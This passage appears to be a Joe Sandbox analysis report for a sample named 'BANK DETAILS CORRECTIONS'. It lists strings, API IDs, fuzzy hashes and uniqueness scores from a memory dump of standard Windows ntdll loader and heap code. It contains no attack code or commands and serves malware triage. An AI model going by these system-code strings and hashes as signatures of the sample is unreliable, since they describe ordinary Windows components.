                                                                                    • ThreadPool: callback %p(%p) returned with preferred languages set, xrefs: 0198106B
                                                                                    • ThreadPool: callback %p(%p) returned with a transaction uncleared, xrefs: 01980FE5
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000C.00000002.1418954641.00000000018F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018F0000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_12_2_18f0000_BANK DETAILS CORRECTIONS.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: ThreadPool: callback %p(%p) returned with a transaction uncleared$ThreadPool: callback %p(%p) returned with background priorities set$ThreadPool: callback %p(%p) returned with preferred languages set$ThreadPool: callback %p(%p) returned with the loader lock held
                                                                                    • API String ID: 0-1468400865
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Strings
                                                                                    • minkernel\ntdll\ldrinit.c, xrefs: 0198A9A2
                                                                                    • apphelp.dll, xrefs: 01942462
                                                                                    • Getting ApphelpCheckModule failed with status 0x%08lx, xrefs: 0198A992
                                                                                    • LdrpDynamicShimModule, xrefs: 0198A998
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000C.00000002.1418954641.00000000018F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018F0000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_12_2_18f0000_BANK DETAILS CORRECTIONS.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: Getting ApphelpCheckModule failed with status 0x%08lx$LdrpDynamicShimModule$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                                                    • API String ID: 0-176724104
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000C.00000002.1418954641.00000000018F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018F0000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_12_2_18f0000_BANK DETAILS CORRECTIONS.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: (UCRBlock->Size >= *Size)$HEAP: $HEAP[%wZ]:
                                                                                    • API String ID: 0-4253913091
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000C.00000002.1418954641.00000000018F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018F0000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_12_2_18f0000_BANK DETAILS CORRECTIONS.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: $@
                                                                                    • API String ID: 0-1077428164
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000C.00000002.1418954641.00000000018F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018F0000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_12_2_18f0000_BANK DETAILS CORRECTIONS.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: FilterFullPath$UseFilter$\??\
                                                                                    • API String ID: 0-2779062949
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Strings
                                                                                    • LdrpCheckModule, xrefs: 0198A117
                                                                                    • minkernel\ntdll\ldrinit.c, xrefs: 0198A121
                                                                                    • Failed to allocated memory for shimmed module list, xrefs: 0198A10F
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000C.00000002.1418954641.00000000018F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018F0000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_12_2_18f0000_BANK DETAILS CORRECTIONS.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: Failed to allocated memory for shimmed module list$LdrpCheckModule$minkernel\ntdll\ldrinit.c
                                                                                    • API String ID: 0-161242083
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000C.00000002.1418954641.00000000018F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018F0000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_12_2_18f0000_BANK DETAILS CORRECTIONS.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: ((PHEAP_ENTRY)LastKnownEntry <= Entry)$HEAP: $HEAP[%wZ]:
                                                                                    • API String ID: 0-1334570610
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Strings
                                                                                    • Failed to reallocate the system dirs string !, xrefs: 019982D7
                                                                                    • minkernel\ntdll\ldrinit.c, xrefs: 019982E8
                                                                                    • LdrpInitializePerUserWindowsDirectory, xrefs: 019982DE
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000C.00000002.1418954641.00000000018F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018F0000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_12_2_18f0000_BANK DETAILS CORRECTIONS.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: Failed to reallocate the system dirs string !$LdrpInitializePerUserWindowsDirectory$minkernel\ntdll\ldrinit.c
                                                                                    • API String ID: 0-1783798831
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Strings
                                                                                    • @, xrefs: 019DC1F1
                                                                                    • \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings, xrefs: 019DC1C5
                                                                                    • PreferredUILanguages, xrefs: 019DC212
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000C.00000002.1418954641.00000000018F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018F0000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_12_2_18f0000_BANK DETAILS CORRECTIONS.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: @$PreferredUILanguages$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings
                                                                                    • API String ID: 0-2968386058
                                                                                    • Opcode ID: 45189ca0c02d6fe248abe4c30dec879b29572b4e9f9f22cc428f3efe1dfebf98
                                                                                    • Instruction ID: 57cdd234a5f477832a1b32e4620ec0564ddd32881005e953f59f40dd03cfa513
                                                                                    • Opcode Fuzzy Hash: 45189ca0c02d6fe248abe4c30dec879b29572b4e9f9f22cc428f3efe1dfebf98
                                                                                    • Instruction Fuzzy Hash: 18414171E00209EBEB11DBD8C891FEEBBBDAB54741F14816EE60DA7244D774DA44CB60
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000C.00000002.1418954641.00000000018F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018F0000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_12_2_18f0000_BANK DETAILS CORRECTIONS.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: @$LdrpResValidateFilePath Enter$LdrpResValidateFilePath Exit
                                                                                    • API String ID: 0-1373925480
                                                                                    • Opcode ID: 2118807f3bb7fa51df48c89b763be024ce3555dbc72045d02dc6ac2611135727
                                                                                    • Instruction ID: 9c681878c66acf6ff3dc472ed3d824e888125aef252cf01e48617701546e37dc
                                                                                    • Opcode Fuzzy Hash: 2118807f3bb7fa51df48c89b763be024ce3555dbc72045d02dc6ac2611135727
                                                                                    • Instruction Fuzzy Hash: 40410731D006588FEB26DBD9CA84BEDBBB8FFA5340F140469D90AEB792D7349901DB50
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Strings
                                                                                    • minkernel\ntdll\ldrredirect.c, xrefs: 019A4899
                                                                                    • LdrpCheckRedirection, xrefs: 019A488F
                                                                                    • Import Redirection: %wZ %wZ!%s redirected to %wZ, xrefs: 019A4888
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000C.00000002.1418954641.00000000018F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018F0000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_12_2_18f0000_BANK DETAILS CORRECTIONS.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: Import Redirection: %wZ %wZ!%s redirected to %wZ$LdrpCheckRedirection$minkernel\ntdll\ldrredirect.c
                                                                                    • API String ID: 0-3154609507
                                                                                    • Opcode ID: d02741d3d2af9bcfacbdd62bb494cd931a7275062122eb30a5b3e2e33fae7307
                                                                                    • Instruction ID: 6c7ae7c26651739b2eae2b4c3ebed81e6ec3e7ec7170401b2481fef2c16df7e2
                                                                                    • Opcode Fuzzy Hash: d02741d3d2af9bcfacbdd62bb494cd931a7275062122eb30a5b3e2e33fae7307
                                                                                    • Instruction Fuzzy Hash: 0D41D636A042919FCB21CE5CE840E267BE9EF89A51B8D056DED4DD7311D7B0D804CBD2
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000C.00000002.1418954641.00000000018F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018F0000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_12_2_18f0000_BANK DETAILS CORRECTIONS.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: (ROUND_UP_TO_POWER2(Size, PAGE_SIZE) == Size)$HEAP: $HEAP[%wZ]:
                                                                                    • API String ID: 0-2558761708
                                                                                    • Opcode ID: 2499103d31ef662dbb8c49d386c36311f7969319515172962d3105cab7d520a0
                                                                                    • Instruction ID: 49281c83a7be52c0e05a1e673784efc2bf6fe721c643a66c8339fb5ed54d68c5
                                                                                    • Opcode Fuzzy Hash: 2499103d31ef662dbb8c49d386c36311f7969319515172962d3105cab7d520a0
                                                                                    • Instruction Fuzzy Hash: 5E11DF313151069FEB29EA28C481F76B3BAEF80B1AF19852DF40ECB255DB30D885C750
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Strings
                                                                                    • Process initialization failed with status 0x%08lx, xrefs: 019A20F3
                                                                                    • minkernel\ntdll\ldrinit.c, xrefs: 019A2104
                                                                                    • LdrpInitializationFailure, xrefs: 019A20FA
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000C.00000002.1418954641.00000000018F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018F0000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_12_2_18f0000_BANK DETAILS CORRECTIONS.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: LdrpInitializationFailure$Process initialization failed with status 0x%08lx$minkernel\ntdll\ldrinit.c
                                                                                    • API String ID: 0-2986994758
                                                                                    • Opcode ID: ade7e680f7dd783d27a1bf9eade95174d07319f6acafb2ac04ff83ae0f870abc
                                                                                    • Instruction ID: 6d07553d4e613c9963d3aa9a5f522c743e29a4fa56754e7a2a85af8c31de3886
                                                                                    • Opcode Fuzzy Hash: ade7e680f7dd783d27a1bf9eade95174d07319f6acafb2ac04ff83ae0f870abc
                                                                                    • Instruction Fuzzy Hash: C9F0C839640309AFEB25DB4CDC46F95376CFB81B54F500059FB0867281D5B0A645C691
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000C.00000002.1418954641.00000000018F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018F0000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_12_2_18f0000_BANK DETAILS CORRECTIONS.jbxd
                                                                                    Similarity
                                                                                    • API ID: ___swprintf_l
                                                                                    • String ID: #%u
                                                                                    • API String ID: 48624451-232158463
                                                                                    • Opcode ID: 7d41fef1d44f2a2f80d99cee5a12f6fa0382f982d50a8a8f0b006b8e496b763d
                                                                                    • Instruction ID: dd6a4c1ad3527acde49485146fe393ec19dbacb0ee441c5108a20eaa78966dc8
                                                                                    • Opcode Fuzzy Hash: 7d41fef1d44f2a2f80d99cee5a12f6fa0382f982d50a8a8f0b006b8e496b763d
                                                                                    • Instruction Fuzzy Hash: 9F714C71A0014A9FDB01DFA9C994FAEB7F8BF98704F154065E909E7251EB34EE05CBA0
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Strings
                                                                                    • LdrResSearchResource Exit, xrefs: 0192AA25
                                                                                    • LdrResSearchResource Enter, xrefs: 0192AA13
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000C.00000002.1418954641.00000000018F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018F0000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_12_2_18f0000_BANK DETAILS CORRECTIONS.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: LdrResSearchResource Enter$LdrResSearchResource Exit
                                                                                    • API String ID: 0-4066393604
                                                                                    • Opcode ID: 9fe212cf137b0397c46bd9e4c6157d4359b31c7065f5ecf362ceeb080015c12b
                                                                                    • Instruction ID: 625c2be09e23d8667ad361f54b224448d27a8d54bf492b5dbe96adbbc0adfeae
                                                                                    • Opcode Fuzzy Hash: 9fe212cf137b0397c46bd9e4c6157d4359b31c7065f5ecf362ceeb080015c12b
                                                                                    • Instruction Fuzzy Hash: 7DE19272E002299FEF22DF99CA80BAEBBBAFF54710F104425E909E7655D734D941CB50
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000C.00000002.1418954641.00000000018F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018F0000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_12_2_18f0000_BANK DETAILS CORRECTIONS.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: `$`
                                                                                    • API String ID: 0-197956300
                                                                                    • Opcode ID: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
                                                                                    • Instruction ID: 95b8d3e0fed9d10f309e2ce79bbcf3fae4dbd5ee6824c8c29748937fced3be7a
                                                                                    • Opcode Fuzzy Hash: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
                                                                                    • Instruction Fuzzy Hash: FEC1D4312043429BE726CF28C849B6BBBE5BFD4715F044A2CF699C72A0D775D505CB51
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000C.00000002.1418954641.00000000018F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018F0000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_12_2_18f0000_BANK DETAILS CORRECTIONS.jbxd
                                                                                    Similarity
                                                                                    • API ID: InitializeThunk
                                                                                    • String ID: Legacy$UEFI
                                                                                    • API String ID: 2994545307-634100481
                                                                                    • Opcode ID: 885a2d9942a80393cf949fbe5692d74c6b0f562763a23084e84c5cd6ba4b9693
                                                                                    • Instruction ID: 77c2d5129a747505b22a82fda7b6f32c3633efebcbf57f150ee8cb5e7f69213a
                                                                                    • Opcode Fuzzy Hash: 885a2d9942a80393cf949fbe5692d74c6b0f562763a23084e84c5cd6ba4b9693
                                                                                    • Instruction Fuzzy Hash: 7F613971E00619AFDB25DFADC840BAEBBB9FB48700F14446EE64DEB291D731A940CB51
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000C.00000002.1418954641.00000000018F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018F0000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_12_2_18f0000_BANK DETAILS CORRECTIONS.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: @$MUI
                                                                                    • API String ID: 0-17815947
                                                                                    • Opcode ID: a900d20ba27c2739d93f74947f3bae246cd3eab2b7ea6cb61134c79de1201fa7
                                                                                    • Instruction ID: c52b431c881809feb5c3de980efe0c1d890872e5a128f57bf9f427a6a58520be
                                                                                    • Opcode Fuzzy Hash: a900d20ba27c2739d93f74947f3bae246cd3eab2b7ea6cb61134c79de1201fa7
                                                                                    • Instruction Fuzzy Hash: 25512A71E0025DAFDF11DFA9CC90AEEBBBCEB54B54F100529E659B7290D6309A05CB60
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Strings
                                                                                    • kLsE, xrefs: 01920540
                                                                                    • TerminalServices-RemoteConnectionManager-AllowAppServerMode, xrefs: 0192063D
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000C.00000002.1418954641.00000000018F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018F0000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_12_2_18f0000_BANK DETAILS CORRECTIONS.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: TerminalServices-RemoteConnectionManager-AllowAppServerMode$kLsE
                                                                                    • API String ID: 0-2547482624
                                                                                    • Opcode ID: a4640bb3e06619c6041b9c4c9a18b4c0b19fa156b692cfef311cb2e67aa642b8
                                                                                    • Instruction ID: adc785d93e27dcecbb3f29497f0313a80edda3e56f0546bb6f69844dff96a693
                                                                                    • Opcode Fuzzy Hash: a4640bb3e06619c6041b9c4c9a18b4c0b19fa156b692cfef311cb2e67aa642b8
                                                                                    • Instruction Fuzzy Hash: 2951DE715007528FD734EF29C444AA7BBE8AF84305F18493EFAAE87245E770D545CB92
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Strings
                                                                                    • RtlpResUltimateFallbackInfo Exit, xrefs: 0192A309
                                                                                    • RtlpResUltimateFallbackInfo Enter, xrefs: 0192A2FB
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000C.00000002.1418954641.00000000018F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018F0000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_12_2_18f0000_BANK DETAILS CORRECTIONS.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: RtlpResUltimateFallbackInfo Enter$RtlpResUltimateFallbackInfo Exit
                                                                                    • API String ID: 0-2876891731
                                                                                    • Opcode ID: 9638e24e5d7ea4842564c4c7b14d9e819e6e5126b47cfac51929df90a6965061
                                                                                    • Instruction ID: 04712ed76aba5f8611d0328dd27062e4204f33a779835a2f9aa5e3d9b85ccaa6
                                                                                    • Opcode Fuzzy Hash: 9638e24e5d7ea4842564c4c7b14d9e819e6e5126b47cfac51929df90a6965061
                                                                                    • Instruction Fuzzy Hash: 1541FF32A05269CFDB21DF59C840B6E7BF8FF85700F1440A9E908DB696E3B5CA00CB80
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000C.00000002.1418954641.00000000018F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018F0000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_12_2_18f0000_BANK DETAILS CORRECTIONS.jbxd
                                                                                    Similarity
                                                                                    • API ID: InitializeThunk
                                                                                    • String ID: Cleanup Group$Threadpool!
                                                                                    • API String ID: 2994545307-4008356553
                                                                                    • Opcode ID: 2050ff5e24176b10d87ce1048a8da597b2de9852c5e7a5e9d1056597e752e697
                                                                                    • Instruction ID: 9c4ff670e6a8a8c4b8b226f8a5437de4f094501f53fe0d1c1cfe161fe72dac9a
                                                                                    • Opcode Fuzzy Hash: 2050ff5e24176b10d87ce1048a8da597b2de9852c5e7a5e9d1056597e752e697
                                                                                    • Instruction Fuzzy Hash: 6B01F4B2241704AFD351DF24DD85F1677E8E794715F018A3DAA5CC7190E374D904CB5A
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000C.00000002.1418954641.00000000018F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018F0000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_12_2_18f0000_BANK DETAILS CORRECTIONS.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: MUI
                                                                                    • API String ID: 0-1339004836
                                                                                    • Opcode ID: 8233b4d3a1ba50283db10fd1f23716aeecab244e3c332c155d949e51d7303b5a
                                                                                    • Instruction ID: eb4aebad443ed107e35d44cd7009134624fe410d4df3d371897ca6437bbb3a7c
                                                                                    • Opcode Fuzzy Hash: 8233b4d3a1ba50283db10fd1f23716aeecab244e3c332c155d949e51d7303b5a
                                                                                    • Instruction Fuzzy Hash: 09825B75E002298FEB25CFA9C880BEDBBB5BF49710F148169E91DAB399D7309D41CB50
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000C.00000002.1418954641.00000000018F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018F0000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_12_2_18f0000_BANK DETAILS CORRECTIONS.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: @
                                                                                    • API String ID: 0-2766056989
                                                                                    • Opcode ID: 6f1e8a3d3e3bdac071bd5feb9394ed534b4c5ce70a05dda4c444e26ddb785004
                                                                                    • Instruction ID: 7d5a6d2e9a79005cece29ffff613995e287f951329a0e26cd523f7793ff0f5b3
                                                                                    • Opcode Fuzzy Hash: 6f1e8a3d3e3bdac071bd5feb9394ed534b4c5ce70a05dda4c444e26ddb785004
                                                                                    • Instruction Fuzzy Hash: CE22CE706046A98BEB25CF29C094776BBF5BF44B41F08885DD9CA8F286F335D452CB62
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000C.00000002.1418954641.00000000018F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018F0000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_12_2_18f0000_BANK DETAILS CORRECTIONS.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID: 0-3916222277
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000C.00000002.1418954641.00000000018F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018F0000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_12_2_18f0000_BANK DETAILS CORRECTIONS.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID: 0-3916222277
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000C.00000002.1418954641.00000000018F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018F0000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_12_2_18f0000_BANK DETAILS CORRECTIONS.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: GlobalTags
                                                                                    • API String ID: 0-1106856819
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000C.00000002.1418954641.00000000018F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018F0000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_12_2_18f0000_BANK DETAILS CORRECTIONS.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: .mui
                                                                                    • API String ID: 0-1199573805
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000C.00000002.1418954641.00000000018F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018F0000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_12_2_18f0000_BANK DETAILS CORRECTIONS.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: EXT-
                                                                                    • API String ID: 0-1948896318
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000C.00000002.1418954641.00000000018F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018F0000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_12_2_18f0000_BANK DETAILS CORRECTIONS.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: BinaryHash
                                                                                    • API String ID: 0-2202222882
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000C.00000002.1418954641.00000000018F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018F0000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_12_2_18f0000_BANK DETAILS CORRECTIONS.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: #
                                                                                    • API String ID: 0-1885708031
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000C.00000002.1418954641.00000000018F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018F0000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_12_2_18f0000_BANK DETAILS CORRECTIONS.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: BinaryName
                                                                                    • API String ID: 0-215506332
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Strings
                                                                                    • AVRF: AVrfDllUnloadNotification called for a provider (%p) , xrefs: 019A895E
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000C.00000002.1418954641.00000000018F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018F0000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_12_2_18f0000_BANK DETAILS CORRECTIONS.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: AVRF: AVrfDllUnloadNotification called for a provider (%p)
                                                                                    • API String ID: 0-702105204
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    • Instruction ID: 0ea713060cc372078130a7381afdd5f1468f0957e6c7f1c1468db83b10c9025b
                                                                                    • Opcode Fuzzy Hash: c58da6bef63a17e65f3132630e1fabe04f2e2fb92a18dec9866503995c4710af
                                                                                    • Instruction Fuzzy Hash: 23B1B674A00605AFEF24DF58C940EBBBBB9FF84346F90445DAE4A97790DA34E909CB50
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000C.00000002.1418954641.00000000018F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018F0000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_12_2_18f0000_BANK DETAILS CORRECTIONS.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: c61ad9210afadd02b75b489723f8fea184d45ce3a0816f7da46b339e1a5f1bc9
                                                                                    • Instruction ID: 7cd80d9b3b93891c36f958c50b83b678262aecd6fe6ac182f4f1f76c8727ac49
                                                                                    • Opcode Fuzzy Hash: c61ad9210afadd02b75b489723f8fea184d45ce3a0816f7da46b339e1a5f1bc9
                                                                                    • Instruction Fuzzy Hash: 89B1F531604646AFDB16DB68C850FBEBBFAAFC4300F184599E55ED7281DB30E941CB90
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000C.00000002.1418954641.00000000018F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018F0000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_12_2_18f0000_BANK DETAILS CORRECTIONS.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 8f948f18b8b66b42cb5e03cbe6bc61e3e7e2dcbc83f8bbce26cd82ab56d41ad5
                                                                                    • Instruction ID: fd801247ad1727cc8f41b0661ec8d0a55701a13a0bc157395c696dcdaf6afb33
                                                                                    • Opcode Fuzzy Hash: 8f948f18b8b66b42cb5e03cbe6bc61e3e7e2dcbc83f8bbce26cd82ab56d41ad5
